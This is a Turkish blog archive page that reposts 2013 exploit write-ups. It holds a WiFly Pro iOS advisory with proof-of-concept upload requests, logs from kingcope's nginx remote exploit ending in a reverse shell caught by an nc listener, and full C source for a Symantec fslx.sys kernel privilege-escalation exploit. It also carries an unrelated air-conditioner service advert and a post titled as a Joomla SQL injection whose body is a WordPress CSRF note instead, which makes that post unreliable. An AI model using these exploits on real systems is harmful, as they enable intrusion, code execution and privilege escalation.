Archive for Genel

admin | 21 Temmuz 2013
No comments

WiFly 1.0 Pro iOS – Multiple Web Vulnerabilities

WiFly 1.0 Pro iOS – Multiple Web açıkları bulunmuş olup açığın kullanımı hakkında yorumlar aşağıdaki şekilde bulunmaktadır.

Title:
======
WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities


Date:
=====
2013-07-15


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1011


VL-ID:
=====
1011


Common Vulnerability Scoring System:
====================================
6.3


Introduction:
=============
It is the best solution for transferring photos, songs, documents, movies and other files between computer 
and your mobile devices over wireless network. Simply launch application on your iOS device and scan QR 
code from http://wifly.me to connect your phone. Drop your files into opened page and vice versa!
No cloud or internet access required - no data leaves your local network. Both your devices must have access 
to the same LAN or WLAN - no additional network configurations needed. Transferred documents can be opened with 
any supported App on your iOS device.

Capabilities:

- Multiple uploads

- Easily Drag & Drop multiple files to WiFly

- Preview pictures in the browser
- Downloading the entire folder to your computer

- Browsing files and folders directly on mobile device

- Exchange files between mobile devices
- Built in preview of images, documents, music and video files

(Copy of the Homepage: https://itunes.apple.com/us/app/wifly-pro/id641092695 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).


Report-Timeline:
================
2013-07-15:    Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: WiFly Pro 1.0


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
A local file include and arbitrary file upload web vulnerability is detected in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).

The vulnerabilities are located in the file upload module of the web-server (http://localhost:4885/) when processing 
to request via POST a manipulated filename. The injected file will be accessable via the index listing module of the application.  

Remote attackers can exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. 
After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php, js, html codes.

The filter in the application itself disallow to rename a file with special chars because of a input field restriction. Attackers need to request 
2 different urls. First the file as url with a parameter of the filename inside to display and as secound step the file will be uploaded with 
the manipulated filename in the POST request.

Exploitation of the vulnerability requires no user interaction but the victim iOS device needs to accept the other device connection.
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
                                [+] WiFly Pro 1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
                                [+] Upload

Vulnerable File(s):
                                [+] upload.json & add

Vulnerable Parameter(s):
                                [+] filename

Affected Module(s):
                                [+] Index Listing (http://localhost:4885/)


Proof of Concept:
=================
The local file/path include and arbitrary file upload vulnerability can be exploited by remote attackers without user interaction 
but the connection needs to be accepted by the target system. For demonstration or reproduce ...

Standard Request:
Content-Disposition: form-data; name="files[]"; filename="s2.png"\r\nContent-Type: image/png\r\n\r\n?PNG\r\n\n

Status: 200 
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=new-image23.png&sessionid=1373658611109 
Load Flags[LOAD_BYPASS_CACHE  ] Content Size[118] Mime Type[application/x-unknown-content-type]
   


PoC: 1.1 - File/Path Include Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&
last_modified=1331091664536000&name=../../[File/Path Include Vulnerability!].png&sessionid=1373658611109 
POST_DATA[-----------------------------27213192708057
Content-Disposition: form-data; name="files[]"; filename="../../[File/Path Include Vulnerability!]"
Content-Type: image/png


PoC: 1.2 - Arbitrary File Upload Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&
last_modified=1331091664536000&name=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js&sessionid=1373658611109 
POST_DATA[-----------------------------27213192708057
Content-Disposition: form-data; name="files[]"; filename="[Arbitrary File Upload Vulnerability!].png.gif.html.php.js"
Content-Type: image/png


Solution:
=========
The vulnerability can be patched by a restriction of the json upload request and url parameter.
The POST request when processing to upload needs to be restricted, encoded and filtered.


Risk:
=====
The security risk of the local file/path include & arbitrary file upload vulnerability is estimated as high.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ()


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:             -                - 
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - magazine.vulnerability-db.com
Social:                  -                 - 
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ( or ) to get a permission.

                                Copyright � 2013 | Vulnerability Laboratory [Evolution Security]







-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT:
Category: Genel | Tags:
admin | 18 Temmuz 2013
No comments

nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit

nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit Uzaktan kod çalıştırma back connect açığına ilişkin açıklamalar aşağıdaki gibidir.

#nginx 1.3.9/1.4.0 x86 brute force remote exploit
# copyright (c) 2013 kingcope
#----------------------------
#fix for internet exploitation, set MTU:
#ifconfig <interface> mtu 60000 up
#
###
# !!! WARNING !!! 
# this exploit is unlikely to succeed when used against remote internet hosts.
# the reason is that nginx uses a non-blocking read() at the remote connection,
# this makes exploitation of targets on the internet highly unreliable.
# (it has been tested against a testbed on the internet but I couldn't exploit
# any other box with it. required was the above ifconfig setting on the client.
# maybe enabling large tcp frame support on a gigabit connection is more
# useful)
# so use it inside intranets only (duh!), this remains a PoC for now 😀
# The exploit does not break stack cookies but makes use of a reliable method
# to retrieve all needed offsets for Linux x86 and pop a shell.
###
#TODO
#*cleanup code
#*implement stack cookie break and amd64 support
#*support proxy_pass directive
###
=for comment
TARGET TESTS (Debian, Centos, OpenSuSE)

1. Debian 7
perl ngxunlock.pl  
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5182 align  % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5182 align  % SEGV %
Finding write offset, determining exact align
testing 0x08049c50, 5184 align  % SURVIVED %
Extracting memory \
bin search done, read 20480 bytes
exact align found 5184
Finding exact library addresses
trying plt 0x08049a32, got 0x080bc1a4, function 0xb76f4a80  % FOUND exact ioctl 0x08049a30 %
trying plt 0x08049ce2, got 0x080bc250, function 0xb773e890  % FOUND exact memset 0x08049ce0 %
trying plt 0x08049d52, got 0x080bc26c, function 0xb76f8d40  % FOUND exact mmap64 0x08049d50 %
Found library offsets, determining mnemonics
trying 0x0804ed2d  % SURVIVED %
exact large pop ret 0x0804a7eb
exact pop x3 ret 0x0804a7ee
bin search done |
See reverse handler for success

nc -v -l -p 443
listening on [any] 443 ...
192.168.27.146: inverse host lookup failed: Unknown host
connect to [192.168.27.146] from (UNKNOWN) [192.168.27.146] 34778
uname -a;id;
Linux dakkong 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
cat /etc/debian_version
7.1

2. CentOS 6.4
perl ngxunlock.pl  
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5194 align  % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5194 align  % SEGV %
Finding write offset, determining exact align
testing 0x08049990, 5200 align  % SURVIVED %
Extracting memory /
bin search done, read 20480 bytes
exact align found 5200
Finding exact library addresses
trying plt 0x080499f2, got 0x080b31ac, function 0x0094a6b0  % FOUND exact memset 0x080499f0 %
trying plt 0x08049b52, got 0x080b3204, function 0x008f1fd0  % FOUND exact ioctl 0x08049b50 %
trying plt 0x08049f12, got 0x080b32f4, function 0x008f72c0  % FOUND exact mmap64 0x08049f10 %
Found library offsets, determining mnemonics
trying 0x0804e9d4  % SURVIVED %
exact large pop ret 0x0806194d
exact pop x3 ret 0x0804a832
bin search done /
See reverse handler for success

nc -v -l 443
Connection from  port 443 [tcp/https] accepted
uname -a;id;
Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
cat /etc/redhat*
CentOS release 6.4 (Final)

3. OpenSuSE 12.1
perl ngxunlock.pl  
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5182 align  % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5182 align  % SEGV %
Finding write offset, determining exact align
testing 0x08049a18, 5184 align  % SURVIVED %
Extracting memory \
bin search done, read 20480 bytes
exact align found 5184
Finding exact library addresses
trying plt 0x08049a6a, got 0x080be08c, function 0xb75f74f0  % FOUND exact memset 0x08049a68 %
trying plt 0x08049b8a, got 0x080be0d4, function 0xb764b160  % FOUND exact ioctl 0x08049b88 %
trying plt 0x08049eea, got 0x080be1ac, function 0xb76501e0  % FOUND exact mmap64 0x08049ee8 %
Found library offsets, determining mnemonics
trying 0x0804ea7f  % SURVIVED %
exact large pop ret 0x0804a7fa
exact pop x3 ret 0x0804a101
bin search done -
See reverse handler for success

Connection from  port 443 [tcp/https] accepted
uname -a;id;
Linux linux-01xg 3.1.0-1.2-desktop #1 SMP PREEMPT Thu Nov 3 14:45:45 UTC 2011 (187dde0) i686 i686 i386 GNU/Linux
uid=65534(nobody) gid=65533(nobody) groups=65533(nobody),65534(nogroup)

cat /etc/SuSE-*
openSUSE
VERSION = 12.1
openSUSE 12.1 (i586)
VERSION = 12.1
CODENAME = Asparagus
=cut
Category: Genel | Tags:
admin | 18 Temmuz 2013
3 comments

Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit

Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit

# Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit
# Date: 2013-7-17
# Author : MJ0011
# Version: Symantec Workspace Virtualization 6.4.1895.0
# Tested on: Windows XP SP3

DETAILS:

In fslx.sys 's hook function of "NtQueryValueKey" , it directly write to the buffer of "ResultLength" without any check

EXPLOIT CODE:

#include "stdafx.h"
#include "windows.h"
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
typedef LONG
(WINAPI *pNtQueryValueKey)(
                                 HANDLE KeyHandle,
                                 PUNICODE_STRING ValueName,
                                 ULONG KeyValueInformationClass,
                                PVOID KeyValueInformation,
                                 ULONG Length,
                                 PULONG ResultLength
    );
typedef
LONG (WINAPI *pNtQueryIntervalProfile )(
                                                 ULONG ProfileSource,
                                                 PULONG Interval
    );

typedef LONG
(WINAPI *pZwQuerySystemInformation) (
                                                   ULONG SystemInformationClass,
                                                   PVOID SystemInformation,
                                                   ULONG SystemInformationLength,
                                                   PULONG ReturnLength
    );
#include "malloc.h"
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
pZwQuerySystemInformation ZwQuerySystemInformation = (pZwQuerySystemInformation)GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{

        status = ZwQuerySystemInformation(ATableType , mPtr , mSize , 0 );
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
    ULONG   Unknown1;
    ULONG   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
 ULONG x1,
 ULONG y1,
 ULONG x2,
 ULONG y2,
 ULONG color
    );
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
 ULONG Color
    );
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
 PUCHAR *Str
    );

typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
    INBV_DISPLAY_STRING_FILTER DisplayStringFilter
    );
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
    BOOLEAN bEnable
    );
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
    ULONG x1,
    ULONG y1,
    ULONG x2,
    ULONG y2
    );
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
    PUCHAR Str
    );
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;

#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
"                                                                                "
"                                                                                "
"                                                                                "
"                ---- ===== EXPLOIT SUCCESSFULLY ==== ----                       "
"                                                                                "
"                                                                                "
" Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit"
"                                                                                "
" VULNERABLE PRODUCT                                                             "
"                                                                                "
" Symantec Workspace Virtualization                                              "
"                                                                                "
"                                                                                "
" VULERABLE FILE                                                                 "
" fslx.sys <= 6.4.1895.0                                                         "
"                                                                                "
" AUTHOR                                                                         "
"                                                                                "
" MJ0011                                                                         "
"                                                              "
"                                                                                "
" 2013-7-17                                                                      "
" Symantec's technology is hundreds of years behind that of us                   "
"                                                                                "
"                                                                                ";

VOID InbvShellCode()
{
//DISABLE INTERRUPT

__asm
{
cli
}

//RESET TO VGA MODE

InbvAcquireDisplayOwnership();

InbvResetDisplay();

//FILL FULL SCREEN

InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);

//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);

InbvInstallDisplayStringFilter(NULL);

InbvEnableDisplayString(TRUE);

InbvSetScrollRegion( 0 , 0 , 639 ,477);

InbvDisplayString(DisplayString);
while(TRUE)
{

};

}

BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);

if (hlib == NULL)
{
return FALSE ;
}

InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);

if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ;
}
return FALSE ;

}

typedef LONG (WINAPI *PNT_ALLOCATE_VIRTUAL_MEMORY)(
                                                                                                   HANDLE ProcessHandle,
                                                                                                   PVOID *BaseAddress,
                                                                                                   ULONG ZeroBits,
                                                                                                   PSIZE_T RegionSize,
                                                                                                   ULONG AllocationType,
                                                                                                   ULONG Protect
  );
#define  ProfileTotalIssues  2

int main(int argc, char* argv[])
{
        printf("Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n"
                "fslx.sys <= 6.4.1895.0\n"
                "\nBy MJ0011\n2013-7-17\\nPRESS ENTER\n");

        getchar();
        PSYSTEM_MODULE_INFORMATION pinfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
        if (pinfo==0)
        {
                printf("cannot get system info\n");
                return 0 ;
        }
        if (!InbvInit(pinfo->Module[0].Base , strrchr(pinfo->Module[0].ImageName , '\\') + 1))
        {
                printf("cannot init inbv system!\n");
                return 0 ;
        }
        pNtQueryValueKey NtQueryValueKey = (pNtQueryValueKey)GetProcAddress(GetModuleHandle("ntdll.dll") ,"NtQueryValueKey");

        //alloc shellcode jump

        PNT_ALLOCATE_VIRTUAL_MEMORY NTAllocateVM = (PNT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");

        PVOID BaseAddress = (PVOID)0x1 ;
        ULONG dwsize = 0x1000 ;
        LONG status ;
        status = NTAllocateVM
                (
                GetCurrentProcess() ,
                &BaseAddress ,
                0 ,
                &dwsize ,
                MEM_COMMIT | MEM_RESERVE ,
                PAGE_READWRITE
);

        if (status !=0)
        {
                printf("err alloc vm %08x\n", status);
                getchar();
                return 0 ;
        }
        //result length always <=0x800
        //0~0x800: NOP
        //0x800: shell code

        memset((PVOID)0x0 , 0x90 , 0x1000);
        *(BYTE*)((ULONG)0x800) = 0xe9 ;
        *(ULONG*)((ULONG)0x801) = (ULONG)InbvShellCode - (ULONG)0x800 - 0x5 ;

        //get haldispatchtable

        HMODULE hntos = LoadLibrary(strrchr(pinfo->Module[0].ImageName , '\\')+1);
        if (hntos == 0 )
        {
                printf("cannot load ntos\n");
                getchar();
                return 0 ;
        }
        PVOID pHalDispatchTable = GetProcAddress(hntos , "HalDispatchTable");
        pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);
        pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pinfo->Module[0].Base);
        PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG));
        FreeLibrary(hntos);

        HKEY hkey ;
        ULONG err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_READ , &hkey);

        if (err!=ERROR_SUCCESS)
        {
                printf("open key read failed %u\n" ,err);
                getchar();
                return 0 ;
        }
        HKEY hkey2 ;

        err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_WRITE , &hkey2);

        if (err != ERROR_SUCCESS)
        {
                printf("open key write failed %u\n", err);
                getchar();
                return 0 ;
        }
        DWORD dd ;

        err = RegSetValueEx(hkey2 , "123" , 0 , REG_DWORD , (CONST BYTE*)&dd , sizeof(DWORD));

        if (err != ERROR_SUCCESS)
        {
                printf("set value %u\n" , err);
                getchar();

                return 0 ;
}       BYTE buffer[100];
        PVOID pbuf = buffer ;

        UNICODE_STRING name ;
        name.Buffer = NULL ;
        name.Length = 0 ;
        name.MaximumLength=0;
         status = NtQueryValueKey(hkey , &name , 2 , pbuf , 100 , (PULONG)xHalQuerySystemInformationAddr );

        //fire our shell code

        pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryIntervalProfile");

        NtQueryIntervalProfile(ProfileTotalIssues , 0 );

        return 0;
}
Category: Genel | Tags:
admin | 16 Temmuz 2013
No comments

Sharp Klima servisi

Sharp-klima-servisi

Sharp Klima Servisi ayrıcalığı ile Siz sayın değerli tüketicilerimiz olarak klima cihazlarınız ile alakalı arıza yada montaj veya bakım için çözüm arıyorsunuz ve doğru adrestesiniz.  Sharp Klima Servisi ayrıcalığı ile servis sahasındaki her personelimizin kullandığı araç sürekli yenilenir. Sharp Klima Servisi dürüstlüğü ile araçlarımızda gerekli olan tüm yedek parça ve gerekli takım aletleri yer almaktadır.

Sharp Klima Servisi adı altında ile Aksi bir durum karşısında dahi bu soğuk hava da sizleri asla zorda durumda bırakmayarak gerekirse ofise geri dönüş yapılarak gerekli parça aynı gün içerisinde tedarik edilir. Sharp Klima Servisi ayrıcalığı ile Firmamız olarak ilk prensibimiz ’ güvendir.

Sharp Klima Servisi ayrıcalığı ile Yıllardır cihazlarınız satış sonrası arkasında duran bir servis anlayışıyla karşılaşmadığınız düşünüyorsanız henüz bizleri aramadığınız anlamına gelir ki biz cihazla alakalı ticari çıkar doğrultusunda değişmesi gerekli olmadığı halde malzeme değiştirme arızayı yarım bırakmayız.

Sharp Klima Servisi ayrıcalığı ile Cihazınızla ilgili yapılan arızalar bir hafta içinde tekrar ederse servis ücreti ikinci tekrarda alınmaz. Sharp Klima Servisi ayrıcalığı ile 1 yıl içerisinde ise değişen tüm malzemeleriniz garanti altına alınır.

Sharp klima bakımı servisimize ulaştığınız ilk andan itibaren vermiş olduğunuz adres ibilgisini ulaşım çok kolay.Sharp Klima Servisi ayrıcalığı ile Çünkü zaten en gerekli olan klimalarınız için bir de adres aramakla zaman kaybedilmez. Navigasyon araçlarımız  sayesinde yol haritalarıyla adresinize en yakın sürede ulaşım sağlanacaktır. Sharp Klima Servisi ayrıcalığı ile Fiyatlarımız tüm müşterilerimize standarttır.

Kullanıcı ilişkilerinde uzmanlaşmış çağrı merkezi operatörlerimiz sizlerden gelen çağrıları hemen istikametin de gerekli bilgileri alarak bölgeye en yakın konumdaki aracımızı sizlere yönlendirmekte ve çözüm hızla sağlanmaktadır.Sharp Klima Servisi ayrıcalığı ile Bunu da siz saygıdeğer müşterilerimiz .

Sharp Klima servisimizi arayarak görebilirsiniz. Sharp Klima Servisi ayrıcalığı ile  tüm marka cihazlarınızda teknik servis personellerimiz eğitim ve gerekli semineri almıştır. Sharp Klima Servisi ayrıcalığı ile Bakım konusundan da her fırsat diler getirdiğimiz gibi her yıl bakım yaptırıyor olmanız bir kayıp değil aksinde cihazınız ömrü için daha uzun süre kullanmanızı ve yakıt tasarrufu sağlamış olursunuz.

Sharp Klima Servisi ayrıcalığı ile Klimalarınızın zaten kış aylarında yakıt acısında kabuslarınız olmuşken sizleri cihazınızla alakalı sıkıntıya sokmaz var olan gerekli hizmet için bütçenizi düşünerek işlem yapılacaktır. Sharp Klima Servisi ayrıcalığı ileSharp Klima Servisi ayrıcalığı ile hizmet anlayışımız asla bu günlük bu kadar yeter anlayışıyla kalmadı .

Sharp Klima Servisi ayrıcalığı ile Aksine 7/24 servis anlayışla her daim sizlere hizmet vermekten kaçınmadan hizmet vermekteyiz. Sharp Klima Servisi ayrıcalığı ile Servis bünyemizde yetişen uzun süreli elamanlarımız olarak ortak amacı için çalışma konusunda eğitimli daima almıştır.

Sharp Klima Servisi ayrıcalığı ile Her personelimiz müşteri odaklı ve samimiyet oranını bilerek hareket etmektedirler. Sharp Klima Servisi ayrıcalığı ile Firmamız kaliteden ödün vermeyerek 7/24 hizmet sürdürmekten kaçınmıyoruz.

Category: Genel |
admin | 30 Haziran 2013
One comment

Joomla component com_s5clanroster SQL Injection Vulnerability

joomlaJoomla component com_s5clanroster SQL Injection açığı bulunmuş olup, açık bulucunun açığın oluşum yeri ile ilgili açıklamaları şu şekilde;

# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet

Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13

Description:
This allows you to sign up with admin privileges if you make the admin
visit your CSRF script.

http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator
Category: Genel | Tags: ,
« Older Entries   Recent Entries »